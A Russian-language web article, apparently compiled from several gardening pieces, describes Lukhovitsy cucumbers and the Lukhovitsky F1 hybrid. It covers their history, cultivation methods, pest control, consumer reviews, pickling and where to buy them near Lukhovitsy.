21 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Огурец луховицкий отзывы описание сорта фото

Луховицкий огурец: описание, фото и отзывы

Родиной огурца считается Индия. Согласно древним летописям, этот овощ здесь употреблялся в пищу еще в 3 тыс. до н. э. Позднее огурцы начали возделывать в Египте и в Греции. Об этом свидетельствуют их многочисленные изображения на фресках. В России этот овощ появился в XV веке и уже к XVI завоевал огромную популярность. В нашей стране эту культуру возделывают по разным методикам, позволяющим получать богатый урожай плодов. В Подмосковье, к примеру, необыкновенно популярен луховицкий огурец.

Общее описание

Собственно сортом этот огурец не является. Отдельное название он получил благодаря тому, что выращивается в местности с необычным микроклиматом по особой технологии, позволяющей получать большое количество маленьких хрустящих аккуратных плодов. Возделывается эта интересная разновидность огурца в окрестностях городка Луховицы в Подмосковье.

Немного истории

Жившие когда-то на территории Подмосковья крестьяне в большинстве случаев черного земледелия не признавали. Занимались в этих краях в основном животноводством, разного рода промыслами, рыбной ловлей. Однако после революции в пойме реки Оки началась масштабная распашка земель. Многим местным жителям были выделены участки под огородничество. Владельцы советских дач обратили внимание на то, что из всех возделываемых ими культур наибольшие урожаи дают огурцы.

Постепенно владельцы участков, расположенных по берегам реки Оки под Луховицами, выработали особую технологию возделывания огурцов. Первоначально выращенные овощи они продавали на рынках Москвы и области. Позднее урожай начал вывозиться луховичанами и в другие регионы России.

Какие сорта используют в Луховицах

Практически из любых семян в этой местности может быть выращен луховицкий огурец. Сорт «Изящный» и гибрид «Либелле» были необыкновенно популярны в этой местности в советские годы. Сейчас на участках этого района Подмосковья выращиваются самые разные отечественные и голландские сорта. Для того, чтобы получить настоящие луховицкие огурчики, местные жители используют в основном холодостойкие и выносливые в отношении заболеваний разновидности.

Что представляют собой луховицкие огурцы

Почему же так ценятся зеленцы из этой местности на рынках Москвы и других городов России? Идеальным луховицким огурцом считается плод, имеющий небольшие размеры — 5-7 см в длину, абсолютно ровной формы, свежий, с тонкой нежной корочкой, хрустящий и покрытый пупырышками. Помимо особой технологии выращивания, местные жители соблюдают и культуру торговли такими зеленцами. Сорванный накануне огурец уже к утру должен лежать на прилавке.

Несколько лет назад на рынках Московской и близлежащих областей начали появляться якобы луховицкие зеленцы, на самом деле выращенные в Рязанской, Ростовской или Тамбовской областях. Поэтому администрацией Луховицкого района было принято решение запатентовать свои огурчики. Всех фермеров, выращивающих эту культуру, обязали получать особые сертификаты.

Огурец Луховицкий F1: описание, фото, особенности выращивания

Не так давно отечественными селекционерами был получен и особый сорт — Луховицкий F1. Это раннеспелый огурец женского типа цветения, дающий темно-зеленые со светлыми полосками белошипные плоды.

Очень хорошие заслужил огурец Луховицкий F1 отзывы дачников, в основном благодаря своей неприхотливости и урожайности. Выращивается этот сорт по схеме 50х50 см. Зеленцы могут достигать размеров 10-13 см. Конечно же, без соблюдения особой технологии настоящие луховицкие огурцы из такой рассады вырастить нельзя. Однако в любом случае плоды этого сорта отличаются хорошими вкусовыми характеристиками, имеют сочную мякоть и тонкую кожицу. Фото такого огурчика представлено ниже.

Технология возделывания

Как и в прошлом веке, в нынешнем на вес и качество луховицких огурцов огромное влияние оказывает уникальный микроклимат низовья Оки. По-прежнему владельцы дачных участков, благодаря повышенной влажности воздуха и длительному безморозному периоду, собирают на жирных почвах поймы богатейшие урожаи самых вкусных в России зеленцов. Выращиваются луховицкие огурцы (фото таких плодов разных сортов можно видеть в статье) по такой технологии:

  • На дно больших парников плотным слоем укладывается солома. В последующем она начнет подгнивать и подогревать рассаду снизу.
  • Поверх соломы насыпается особая почвосмесь, состоящая из земли, перегноя и торфа.
  • Далее высаживается собственно сам луховицкий огурец. Семена замачиваются на некоторое время в воде и помещаются в парник.
  • Сверху рассадный парник накрывается двумя слоями полиэтиленовой пленки.

Производится высадка по такой технологии ранней весной, еще до стаивания снега. Через месяц подросшую рассаду переносят на обычные грядки, накрытые пленкой. Предварительно поверхность почвы мульчируют особым материалом с прорезями. В последующем это предотвращает рост сорняков.

Во время выращивания рассады на грядках вручную производится контроль за температурой воздуха (путем открывания и закрывания пленки). Разумеется, огурчики периодически поливают. В последующем зеленцы, достигшие оптимальных размеров, периодически срывают (примерно через день). Эта традиционная технология выращивания огурцов вот уже много лет передается в луховицких семьях из поколения в поколение.

Памятник

В самом Луховицком районе выращиваемые дачниками зеленцы в пищу употреблять очень любят. Едят их и в свежем виде, и консервированными, и в салатах. Этот овощ здесь настолько популярен, что ему даже поставили памятник. Монумент изображает бочку, поверх которой лежит большой луховицкий огурец. По всей поверхности зеленца разбросаны монеты, символизирующие благополучие. Выгравированная на памятнике надпись гласит: «Огурцу-кормильцу от благодарных луховичан».

С первого взгляда такая похвала может показаться в чем-то даже юмористической. Однако на самом деле все более чем серьезно. Поставлен был этот памятник в 2007 году, в день 50-летия города. Решение об этом администрация приняла в основном потому, что в непростые 90-е годы приносивший богатые урожаи овощ стал для луховичан настоящим спасением. Помимо памятника огурцу, в городе открыт и музей этому овощу.

Отзывы потребителей

Конечно же, все, кто пробовал луховицкие сочные хрустящие огурчики, очень их хвалят. Многие считают, что это самые вкусные зеленцы не только в Московской области, но и во всей России. В луховицких огурцах никогда не бывает пустот, а кожица у них практически отсутствует. Раньше некоторые реализуемые на рынках плоды слегка горчили. Местные жители считают, что наличие пары-тройки таких экземпляров в килограмме является признаком полной экологической чистоты продукции. Однако, поскольку требования потребителя в последнее время к разного рода овощной продукции выросли, луховичане перешли на выращивание особых голландских сортов. Такие огурцы совершенно не горчат. Единственным недостатком этих зеленцов считается довольно-таки высокая стоимость.

Отзывы о Луховицком F1

Многие дачники, конечно же, интересуются тем, стоит ли покупать этот сорт огурцов. Луховицкий огурец F1, судя по мнению многих владельцев дачных участков, на самом деле имеет отличные качества и прекрасно имитирует плоды, выращенные в низовьях Оки. Эти огурцы полностью лишены горечи, отличаются сочностью, хрустят и прекрасно подходят для засолки.

Где можно купить

Где же можно приобрести луховицкий огурец? Фото этих овощей, представленные на странице, наглядно демонстрируют их небольшие размеры и аккуратную форму. Приобрести такие хрустящие зеленцы, выращенные в пойме Оки, сегодня можно в основном только на рынках Москвы и МО. И конечно же, их можно купить в самих Луховицах. Расположен этот город в 135 км от столицы, на автомобильной трассе Москва — Челябинск.

В Луховицах этот овощ продают сами выращивающие его дачники. На столичные рынки в наше время им путь, к сожалению, закрыт. Продажей огурчиков, с любовью выращенных на дачных участках в низовьях Оки, в Москве сегодня занимаются только перекупщики. Коммерсанты приезжают в деревни и тоннами скупают пользующийся огромным спросом овощ. Конечно же, реализуют они его на рынках Москвы очень дорого. Но те, кто едет в столицу по трассе Москва — Челябинск, имеют прекрасную возможность приобрести хрустящие маленькие зеленцы, пригодные в том числе и для засолки, немного подешевле прямо на трассе. В районе Луховиц по ее краям стоят сотни дачников-торговцев и реализуют свою знаменитую продукцию.

Еще более свежие Луховицкие огурцы можно купить в нижних деревнях района. Для этого нужно доехать в городе до рынка и следовать к железнодорожной станции. Далее следует ехать до Красной Поймы и повернуть на Фруктовую. Через некоторое время по трассе пойдут указатели на «огурцовые» деревни: Гретово, Ивняги, Псотино и т. д.

Как правильно солить Луховицкие зеленцы

Все разновидности, выращиваемые в этой местности, отличаются прекрасными вкусовыми характеристиками не только в свежем виде, но и будучи законсервированными. В том числе и заслуживший хорошие у дачников огурец Луховицкий F1 отзывы. Использование зеленцов с низовья Оки для засолки позволяет получить экологически чистые вкусные заготовки на зиму. Консервировать зеленцы, выращенные в этой местности, можно любыми способами. У каждой хозяйки наверняка найдется множество методик. Но сами луховичане квасят свои огурчики следующим образом:

  • Сорванные с грядки зеленцы тщательно промывают.
  • Складывают огурчики в стерилизованные банки.
  • Приготавливают рассол с добавлением специй и соли.
  • Заливают его в банки.
  • Ставят огурцы в теплое темное место на 2-3 суток.

После того как появится пенка, банки закрывают пластиковыми крышками и ставят в подвал.

К сожалению, из-за трудностей сбыта такое занятие, как выращивание огурцов, в Луховицком районе в наши дни постепенно теряет популярность. Занимаются возделыванием этой культуры в основном только пенсионеры. По прогнозам некоторых исследователей уже через 15-20 лет «огуречное производство» в этом районе может совершенно сойти на нет. Надеемся, что этого не все-таки не произойдет. Ведь луховицкий огурец на самом деле отличается поистине уникальными вкусовыми характеристиками и к тому же абсолютной экологической чистотой. Чего нельзя сказать о многих овощах, выращиваемых по новомодным технологиям в теплицах и парниках больших хозяйств в других районах страны.

Вкусные и легкие в выращивании огурцы «Луховицкие»

В Московской области есть город Луховицы, который жители с гордостью называют российской столицей огурцов. Здесь их выращивают в каждом дворе, в городе культивируют множество сортов. Местные климатические условия культуре очень подходят.

Официальный гибрид Луховицкий F1 был занесен в Госреестр в 2006 году как самостоятельно выведенный и рекомендованный для разведения в Северном, Северо-Западном, Центральном, Приволжском регионах страны.

Описание огурцов

Луховицкий гибрид — партенокарпик. Его отличает скороспелость и хорошая отдача урожая.

Отличительные черты

Особенности культуры:

  • кусты быстро адаптируются к холоду;
  • могут расти и при отсутствии яркого солнечного цвета;
  • устойчивы ко многим огуречным болезням;
  • имеют только женские цветки (не требуют опыления).

Огурцы подходят для коммерческого выращивания: они хорошо хранятся и не меняют товарный вид при транспортировке.

Состав и свойства

Овощи вкусные и чрезвычайно полезные. Калорийность огурцов составляет 15 ккал на 100 г продукта. Почти 95% в составе занимает вода, поэтому плоды хорошо выводят из организма токсины и промывают почки.

В состав продукта входят витамины А, В1, В2, С, РР, бета-каротин, ценные минеральные вещества: медь, калий, магний, цинк, хром, натрий, фосфор, йод.

Регулярное употребление огурцов препятствует развитию атеросклероза, очищает сосуды и растворяет мелкие камни в почках.

Важно! Людям с выраженной почечной недостаточностью огурцы не рекомендуются.

Характеристики

Теневыносливая культура не замедляет рост даже при дефиците ультрафиолета. При тепличном выращивании не требуется дополнительная установка специальных ламп. В открытом грунте выбирают даже участки с временным затенением.

Прямые солнечные лучи не страшны растению: на листьях не появляются ожоги, плоды не теряют упругость.

Кусты высокорослые, с сильным центральным стеблем. Листья среднего размера, растут густо, ворс на них редкий и мелковатый.

Корневая система развита слабо. Глубина проникновения — не более 40 см. Цветки растут по 3 в соцветиях, имеют характерный светло-оранжевый цвет.

Плоды

Луховицкие огурцы отличаются:

  • цилиндрической, вытянутой формой, длиной до 12 см, средней массой 90–95 г;
  • темно-зеленым цветом, перемежающимся продолговатыми светлыми полосами;
  • глянцевой поверхностью без воскового налета, мягкими шипами и небольшими бугорками на тонкой кожице, которую не очищают при приготовлении салатов;
  • сочной плотной мякотью без пустот;
  • мелкими семенами в небольшом количестве;
  • сладковатым вкусом, отсутствием горечи даже без регулярного полива;
  • характерным тонким ароматом;
  • высокой степенью хруста, которая сохраняется после тепловой обработки или консервирования.

Урожайность

Отличительная черта гибрида — высокая урожайность. На обильность плодоношения практически не влияют погодные условия. Даже при пасмурной и влажной погоде растения плодоносят. Единственное, к чему плохо устойчива культура, — ветер.

На открытых грядках с куста собирают до 8 кг плодов, в теплицах — до 20 кг.

Как вырастить самостоятельно

Огурцы культивируют как рассадным способом, так и прямым посевом в грунт.

Посадка семенами и рассадой

Прямой посев на грядки производят в конце мая. Подготовку почвы для этого начинают еще осенью. Есть весьма оригинальный способ, значительно повышающий урожайность и всхожесть семян. Для этого требуется:

  • сделать траншею глубиной около 50 см и шириной до 1,5 м;
  • по бокам поставить деревянные щиты;
  • на дно траншеи положить пленку;
  • на нее насыпать опилки и свежий навоз;
  • сверху укрыть все соломой и защитным материалом.

Весной остается снять укрытие, перекопать грядку глубиной примерно на штык лопаты, добавить мочевину, слой земляного грунта и полить горячей водой. Семена высаживают в лунки глубиной до 5 см на расстоянии 35–40 см друг от друга.

Важно! Участок выбирают в защищенном от ветра месте. Направленный солнечный свет необязателен.

Семена предварительно обеззараживают в слабом растворе марганцовки. Повышают их устойчивость к возможным холодам на нижней полке холодильника.

Гибрид раннеспелый, поэтому лучше его выращивать рассадным способом. Посев в этом случае осуществляют в апреле. При этом соблюдают несложные правила:

  • высаживают семена в торфяные горшочки без последующего пикирования, так как корневая система у всех гибридов слабая, и пикировку они переносят плохо;
  • обычный почвогрунт смешивают с листовым перегноем;
  • до появления всходов емкости укрывают пленочным материалом, после пленку снимают, а тару выставляют на солнечное место;
  • стенки горшочков перед посадкой разрезают;
  • высадку в грунт производят в конце мая;
  • над грядками устанавливают проволочные каркасы и натягивают на них пленку (снимают конструкцию с наступлением стойкой теплой погоды и по мере роста кустов);
  • схема посадки такая же, как при семенном способе.

Поэтапное выращивание и уход

Агротехника культуры стандартная, но есть некоторые особенности:

  • почва должна быть влажной, богатой органикой;
  • в начале вегетации полив умеренный, по мере созревания плодов — обильный;
  • культуру регулярно подкармливают настоем коровяка или птичьего помета;
  • почву систематически рыхлят, удаляют сорняки;
  • на одном стебле оставляют 2 побега;
  • возможно вертикальное выращивание гибрида с применением подпорок (стебли у Луховицких огурцов крепкие);
  • нижние и пожелтевшие листья удаляют.

Особенности выращивания и возможные трудности

Главная слабость гибрида Луховицкие — поверхностная корневая система. Поэтому ростки пикируют и поливают осторожно. По этой же причине аккуратно рыхлят землю.

Важно! Если нет возможности регулярно поливать огурцы, лучше от их выращивания отказаться.

Увлажняют кусты только теплой отстоянной водой. Следят, чтобы она не попала на листья в солнечные дни и не размывала корневую систему.

Болезни и вредители

Гибрид устойчив к мучнистой росе и кладоспориозу, но может поражаться ложной мучнистой росой.

Для профилактики и борьбы с заболеванием используют:

  • бордоскую жидкость;
  • «Сульфарид»;
  • «Фитоспорин»;
  • серные средства в очень слабой концентрации, так как они обжигают листья.

Один из злостных вредителей огурцов — бахчевая тля. Для избавления от насекомого кусты опрыскивают зольно-мыльным раствором. Чтобы в сухую жаркую погоду не появлялся паутинный клещ, в месте выращивания повышают влажность.

Сбор и применение урожая

Ежедневный сбор огурцов увеличивает плодоношение. Овощи не желтеют, не перезревают, но лучше их снимать хотя бы через день.

Благодаря тонкой кожице огурцы подходят для салатов, консервирования и засолки. Особенно вкусными получаются закуски из слегка недовыращенных плодов. Для этого их собирают ежедневно.

Чтобы урожай хранился дольше, огурцы срезают, немного оставляя плодоножку. Дома хранят в холодильнике в полиэтиленовых пакетах. Так они остаются свежими до недели, не теряя товарный вид.

Преимущества и недостатки

Достоинства гибрида:

  • раннее созревание (на 38–40 день после посадки);
  • самоопыляемость;
  • возможность культивации практически во всех регионах страны;
  • устойчивость к основным болезням;
  • высокая урожайность;
  • одинаковый размер плодов;
  • хорошая транспортабельность с сохранением товарных и вкусовых качеств;
  • пригодность для консервирования, засолки, употребления в свежем виде.

Недостатки:

  • как все гибриды, Луховицкие не сохраняют свои качества в последующих поколениях;
  • огурцы имеют относительно слабую корневую систему;
  • культура восприимчива к холодному ветру.

Отзывы

Фермеры отмечают отличный вкус плодов, товарный вид и универсальность в кулинарии.

Игорь, г. Вознесенск: «Мне нравится неприхотливость гибрида, его устойчивость к болезням. Фактически необходимы только полив и рыхление. Пробовал выращивать вертикально — тоже получилось».

Антон, г. Вологда: «Огурцы у гибрида хороши маринованные: хрустят, одинаковой небольшой формы. В свежем виде вкус у них сладковатый, а я люблю с кислинкой. Впрочем, это на любителя. Для выращивания культура неприхотлива, только поливать ее следует чаще».

Ирина, г. Пенза: «Много слышала о Луховицких огурцах, видела на фото, но сам гибрид выращиваю недавно. Не знаю, как в Луховицах, а у нас огурчики растут обильно. Вкус у них отличный, прямо-таки эталонный для огурца, с моей точки зрения».

Заключение

Луховицкие огурцы — это зарегистрированная марка овощей, выведенных в Луховицком районе. Гибрид Луховицкий f1 от фирмы «Гавриш» доступен для культивирования любому фермеру.

Культура раннеспелая, высокоурожайная и устойчивая к основным болезням. Сладкий вкус плодов, характерный хруст и тонкий аромат никого не оставляют равнодушным.

Огурцы Луховицкие F1: отзывы и описание

Луховицкие огурцы объединяют в себе несколько сортов огурцов с характерными качествами, выращиваемых в Луховицком районе. Луховицкий F1 – высокоурожайная, раннеспелая разновидность огурцов, выведенных селекционной фирмой «Гавриш». В Государственный реестр селекционных достижений занесены в 2006 г. Огурцы Луховицкий F1 допущены к выращиванию в различных регионах: от Северного до Северо-Кавказского округа. Предназначены для личных хозяйств и промышленного выращивания.

Характеристика и описание огурцов Луховицкий F1

Огурец Луховицкий F1 – гибрид, который подходит для выращивания в открытом грунте под пленочными укрытиями и в теплицах.

Обозначение «F1» в названии говорит о том, что гибрид выведен путем скрещивания двух огуречных сортов. В получившейся разновидности соединены лучшие родительские качества. Поэтому огурцы Луховицкий F1 отличаются быстрым созреванием, устойчивостью к заболеваниям и отличным качеством плодов. Особенность гибрида также заключается в том, что он не размножается собственными семенами. Поэтому посевной материал необходимо приобретать каждый год новый.

Срок созревания огурцов Луховицкий F1 ранний – 45-50 дней от появления всходов до начала плодоношения. Гибрид партенокарпический, что означает способность завязывать плоды в отсутствие насекомых-опылителей. Это особенно подходит при выращивании в теплицах или плохой погоде, когда вылет пчел ограничен. Цветет огурец Луховицкий F1 преимущественно женскими цветками, по 1-3 шт. в одном узле.

Растение индетерминантное – ростом стебля неограничен. Плетистость гибрида Луховицкий F1 средняя, листья образует среднего размера, зеленого цвета. Зеленцы вырастают длиной – 10-13 см, цилиндрической формы с мелкобугорчатой поверхностью. Цвет плодов – темно-зеленый со светлыми, размытыми полосами средней длины. Опушение коричневое, плотное. Масса плода – 100-120 г. Зеленцы выровненные, не перерастают, не желтеют. Отдача урожая дружная, продолжительная.

Вкусовые качества огурцов

Вкусовые качества огурцов Луховицкий F1 отличные. В плодах генетически заложено отсутствие горечи. По отзывам и фото, огурцы сорта Луховицкий F1вырастают корнишонного типа с небольшим количеством семян. Мякоть плотная, сочная и хрустящая. Назначение универсальное. Кроме употребления в свежем виде, огурцы подходят для заготовки различных солений, консервирования и маринования.

Плюсы и минусы сорта огурцов Луховицкий F1

Гибрид Луховицкий F1 ранних сроков созревания, его можно выращивать в областях с различным климатом. Пучковое образование завязей позволяет получать высокий урожай огурцов одинакового размера, которые не перерастают и созревают равномерно. Плоды подходят для транспортировки и хранения. Гибрид можно выращивать через рассаду, а также прямым посевом в грунт.

Минусов у огурцов Луховицкий F1 не обнаружено. Важно лишь учитывать, что семена гибрида первого поколения дают продукцию заявленного качества только в первый год выращивания.

Оптимальные условия выращивания

Огурцы выращивают на солнечных местах. Культуре необходимо освещение в течение 12-14 ч. в сутки. Огурец Луховицкий F1 с женским типом цветения при недостатке света сбрасывает цветки. Также количество завязей снижается при выращивании на перегретом воздухе и пересушенной почве. В условиях высоких температур огуречной культуре искусственно повышают влажность, например, с помощью установок туманообразования.

Огурцы – теплолюбивая культура, которая развивается только при температуре выше +15°С. Не переносит сквозняков и резких перепадов температур. Оптимальные дневные температуры для выращивания огурца Луховицкий F1 – +20… +28°С, ночью – + 15… +18°С.

Почвы для выращивания должны быть плодородными, хорошо дренированными и воздухопроницаемыми. Для культуры опасен застой воды у корней. Более всего подходят супесчаные грунты с нейтральной кислотностью.

Сажать огурцы нужно каждый год на новом месте и возвращать культуру на прежнюю почву только через 4 года. Лучшими предшественниками являются: пасленовые, капуста и лук. Огурцы не сажают после картофеля, тыквы и кабачков.

Агротехника огурца Луховицкий F1

Выращивать огурцы Луховицкий F1 благоприятнее всего на высоких, теплых грядах. Органические гряды делают из слоев компоста и почвы с добавлением навоза. Такая грядка отдает много азота, который особенно важен для выращивания культуры. Теплую, удобренную гряду необходимо подготовить с предыдущего сезона.

Посадка на рассаду

Выращивание огурца Луховицкий F1 через рассаду позволяет получить более ранний урожай, а в Северных регионах является единственно возможным способом выращивания.

Время посадки на рассаду зависит от климата и места, где будут выращивать культуру. В стадии рассады огурец Луховицкий F1 должен находиться не более месяца. Отсчитывают это время в обратном порядке от даты высадки в грунт, когда постоянная температура в месте выращивания начинает превышать +15°С.

Молодые сеянцы огурцов плохо переносят пикировку. Поэтому семена не рекомендуют сажать в общую емкость, где корни растений могут перепутаться между собой и повредиться при пересадке.

Семена выращивают сначала в отдельных кассетах. А когда листья начнут смыкаться между собой, рассаду пересаживают в емкости, скрученные из пакета. Так, их будет удобно высаживать в грунт, развернув пакет.

Почву для рассады готовят из огородной земли с добавлением перегноя и разрыхлителя в виде старых опилок или кокосового субстрата.

Семена раскладывают по почве, заглубляют на 1 см и засыпают. Посевы накрывают и оставляют в темном, теплом месте при температуре +22… +25°С. Время прорастания – 4-7 дней. Посевы проверяют каждый день, проветривают и поливают при необходимости. При появлении всходов укрытие снимают и выставляют на солнечное место. Температуру снижают на неделю до +18°С.

В пасмурные дни растения обязательно досвечивают фитолампами, чтобы количество света составляло 10-12 ч. в сутки. На ночь лампы выключают.

Рассаду огурцов подкармливают дважды:

  1. Первый раз после появления одного настоящего листа. Вносят настой птичьего помета в соотношении 1:20 или аммиачную селитру в соотношении 1 ч. л. на ведро воды. Если почва при посадке была высокопитательная и растения выглядят здоровыми, первую подкормку можно пропустить.
  2. Вторую подкормку проводят за 3-4 дня до высадки рассады в грунт. В это время используют комплексные минеральные удобрения.

Поливают огурцы чаще других рассадных культур. За один полив земляной ком увлажняют полностью. Следующий полив проводят после того, как поверхность почвы начинает подсыхать, но остается слегка влажной. Температура воды для полива – +25°С.

Пересаживают рассаду при появлении 5-6 настоящих листьев. Высота готовой к пересадке рассады достигает 20-25 см. Стебель при этом должен находиться в вертикальном положении. За неделю до пересадки растения закаливают, постепенно увеличивая время пребывания в условиях большего количества воздуха и света.

Посадка в грунт

Огурцы Луховицкий F1 подходят для выращивания прямым посевом в открытый грунт или теплицу. Для этого высевают по несколько семян в одну лунку, а после всходов оставляют одно самое сильное растение. Остальные ростки не вырывают, чтобы не повредить корни оставшегося сеянца. А подрезают на уровне почвы продезинфицированным инструментом.

Огурцы не любят загущенных посадок. Между растениями соблюдают расстояние в 25-30 см, а между рядами – около 1 м. В открытом грунте огурцы можно выращивать без подвязки, так их более удобного укрывать в случае необходимости. В качестве защиты от ветра и опоры рядом высаживают кукурузу. Борьбы за влагу в таком соседстве не происходит, потому что кукуруза добывает воду из более глубоких слоев почвы.

Рассаду пересаживают в пасмурный день. Для пересадки растений в предварительно разрыхленной почве делают большие лунки – около 30 см по каждой стороне. На дно насыпают перегной и стакан золы, перемешивают. Насыпанный слой поливают до образования кашицы, в которую высаживают рассаду. Сверху растения засыпают сухой почвой. После посадки под каждый куст выливают около 3-4 л воды.

Полив и подкормка

Огурцы требовательны к влажности воздуха и почвы. Полив осуществляют регулярно: 1 раз в 2-3 дня, в зависимости от состояния почвы. Во время плодоношения полив увеличивают. Вода должна хорошо проходить сквозь грунт. Листья и стебли при поливе не затрагивают.

Для полива используют только теплую воду. Корневая система огурцов распространяется широко под поверхностью почвы, поэтому при поливе необходимо увлажнять всю площадь гряды. При выращивании в открытом грунте поливать и междурядья.

Корневая система огурцов располагается в верхних слоях почвы. При поливе или дожде почвенный слой размывается, корни оголяются и становятся незащищенными. Поэтому при выращивании огурцов на почву рекомендуют накладывать мульчирующий слой. Для этого скошенную траву подсушивают и раскладывают по поверхности вокруг кустов.

Мульча предотвращает почву от пересыхания, сохраняет питательные вещества. Грунт под мульчей остается рыхлым и воздухопроницаемым, не забивается сорняками. Мульчу подкладывают регулярно в течение всего периода выращивания.

Огурцам необходимы регулярные подкормки. В теплице кусты растут интенсивнее, поэтому для них подкормок вносят больше, чем в открытом грунте. Но переизбыток питательных элементов также отрицательно сказывается на растении. Например, избыток азота снижает количество завязей, а в плодах накапливаются нитраты.

План корневых подкормок:

  • первую проводят через 10 дней после пересадки с использованием универсального удобрения;
  • второй раз удобрения вносят во время плодоношения, с повышенным содержанием калия и фосфора;
  • третью можно вносить во второй половине плодоношения с добавлением кальциевой селитры.

Для питания огурцов также применяют листовые подкормки с периодичностью 1 раз в месяц, в зависимости от состояния кустов. Для удобрения применяют органические компоненты, например, зольные и травяные настои, а также растворы на основе куриного помета. Разные удобрения необходимо чередовать друг с другом.

Формирование

Огурцы Луховицкий F1 имеют неограниченный рост, поэтому при достижении верха шпалеры их прищипывают. Так, сила растения распределяется по оставшейся длине для формирования большего количества плодов. Боковое ветвление несильное, поэтому специального формирования не требует.

Первые цветки, образующиеся в пазухах нижних листьев, обрывают. Это необходимо для того, чтобы растение в начале своего роста сформировало сильный стебель и листовой аппарат.

Защита от болезней и вредителей

Одним из вредителей огурцов является бахчевая тля. Для избавления от насекомого применяют опрыскивание зольно-мыльным раствором. Чтобы не появлялся паутинный клещ в сухую и жаркую погоду, в месте выращивания повышают влажность.

По описанию, огурцы Луховицкие F1имеют высокую устойчивость к:

  • настоящей и ложной мучнистой росе;
  • корневой гнили;
  • оливковой пятнистости;
  • пероноспорозу.

Луховицкие огурцы имеют продолжительное время плодоношения. Поэтому обработка во время роста плодов не рекомендуется или ее проводят только биологическими препаратами. Остальные обработки проводят в фазе рассады.

Урожайность

Огурец Луховицкий F1 отличается дружной отдачей плодов. В пазухе листа образуется от двух и более завязей. Урожайность одного растения – 6-8 кг. Для формирования большего количества плодов рекомендуется убирать зеленцы по мере их созревания, чтобы они не задерживали рост новых плодов.

Какие еще сорта огурцов относятся к Луховицким

К Луховицким принято относить различные сорта огурцов, выращиваемые в городе Луховицы. Местность обладает уникальным климатом, особенно подходящим для выращивания огурцов. Сорта с плотной структурой плодов и без пустот, с тонкой кожицей и характерным хрустом здесь особенно удаются.

Одни из популярных сортов, относящиеся к огурцам из Луховиц:

Сорта также объединяют ранние сроки созревания, устойчивость к пониженным температурам, универсальное назначение. Важным отличием также является высокий товарный вид плодов. Луховицкие огурцы вырастают небольших размеров – до 14 см, с пупырчатой поверхностью.

Заключение

Луховицкие огурцы – зарегистрированная марка овощей, которые выращивают только в Луховицком районе. А огурец Луховицкий f1 фирмы «Гавриш» может выращивать любой овощевод на собственном приусадебном участке. Для получения ранней продукции огурцы выращивают через рассаду или прямым посевом в грунт, применяя стандартную агротехнику.

Огурцы Луховицкие — группа сортов с уникальными характеристиками и вкусом

В 20-е годы 20-го века в пойме подмосковной реки Оки, в Луховицком районе, советская власть начала активно развивать сельскохозяйственное производство. И тут местные огородники заметили, что максимально высокий и прибыльный урожай они получают от культивации огурцов.

Постепенно народными селекционерами была отобрана группа наиболее перспективных сортов. Также была разработана специфическая агротехника выращивания, известная сейчас как огурцы Луховицкие. Давайте подробней разберемся во всем этом.

Происхождение культуры

Стоит сразу предупредить, что наименование «луховицкие огурцы» состоит из двух совершенно разных понятий:

  1. Это зеленцы нескольких сортов, выращиваемые в Подмосковье, в Луховицком районе (центр городок Луховицы).
  2. Второе понятие — сравнительно недавно выведенный огурец Луховицкий f1. Сделали это селекционеры агрофирмы Гавриш.

Фото: жители города Луховицы так гордятся своим промыслом, что даже поставили памятник огурцу. Фото: dacha.help

Итак, в Луховицком районе никогда не культивировали особой формы овоща. Уникальность своеобразному бренду придает не сорт огурцов, а местоположение их выращивания.

  1. Луховицкий район раскинулся в пойме реки Оки, на обильно удобренной органикой и полезными веществами земле.
  2. Там существует высокая влажность воздуха, а именно это любят огурцы.
  3. Еще одна уникальная для Средней полосы особенность, которую подметили местные жители — длительный (до 140 суток в году) безморозный период.

Все это значит, что уникальна не определенная форма, вид или сорт овоща, а местоположение его выращивания — по исключительно удачным географическим и климатическим условиям.

Практически все жители Луховицкого района заняты выращиванием огурцов. Фото: radio1.news

Сами луховичане неохотно признают, что растят на своих участках разнообразные сорта рано созревающих партенокарпических гибридных форм огурцов.

Что это значит? Партенокарпические гибриды — это сорта, плодоносящие без опыления. При этом они не являются самоопыляемыми, так как не способны давать жизнеспособные семена.

Все сорта и формы луховицких огурцов объединяют такие свойства:

  • скороспелость;
  • стойкость к холоду;
  • сравнительно маленькие габариты плодов;
  • тончайшая кожица, не мешающая еде;
  • отсутствующие пустоты внутри плода;
  • не горькая «попка»;
  • характерная хрустящая структура мякоти;
  • универсальность применения.

Общие характеристики группы сортов

Луховичанцы культивируют только те формы огурцов, которые прошли тестирование на их земле, отличающиеся стабильной и высокой урожайностью в открытом грунте.

mr-ogorodnik.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d899539d77be5.jpg» alt=»table_pic_» w /> Строение растения

1. Культура однолетняя травянистая. Стебелек темно-зеленый, плетистый, шершавый. Побеги опушенные, заканчиваются усиками. Стебель достигает длины 100–150 см.

2. Листва крупная, сердцевидной формы, пятилопастная. Рассечение долей слабое.

3. Цвет крупный, желтый, разделен на мужские и женские особи, состоит из четырех удлиненно-овальных лепестков.

4. Корневая система мочковатая, разветвленная, слаборазвитая, поверхностная. В глубину уходит до 35 см

flowertimes.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d89953abbdef0.jpg» alt=»table_pic_» w /> Огурцы

1. Плоды — многосемянные зеленцы (недозрелые тыквины) с изумрудно-зеленой кожицей. Внутри них расположено большое количество мягких недоразвитых белых семян.

2. Форма огурцов цилиндрическо-эллиптическая.

3. Кожица плодов покрыта многочисленными пупырышками и бугорками. На ней ясно видны маленькие шипы беловатого тона.

4. Вес плодов составляет 60–130 г, в длину они дорастают до 6–13 см

radio1.news » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d89953bcd7900.jpg» alt=»table_pic_» w /> Вызревание

Луховицкие огурцы относятся к группе партенокарпических гибридов, для которых характерен женский тип цветения и раннеспелость:

  • укореняется культура в конце апреля/начале мая;
  • урожай снимается через 30–45 суток после высадки рассады, в начале-середине июня
cdn.dvinanews.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d89953d986460.jpg» alt=»table_pic_» w /> Урожайность

Луховицкие огурцы отличаются высокой плодовитостью.

С 1 кв. м посадок можно собирать 5–10 кг плодов

nkj.ru » src=»https://qlumba.com/wp-content/uploads/2019/09/fmg5d89953e95b3f1.jpg» alt=»table_pic_» w /> Предназначение

Огурцы универсальны в потреблении:

  • их едят свежими;
  • добавляют в салаты и различные блюда;
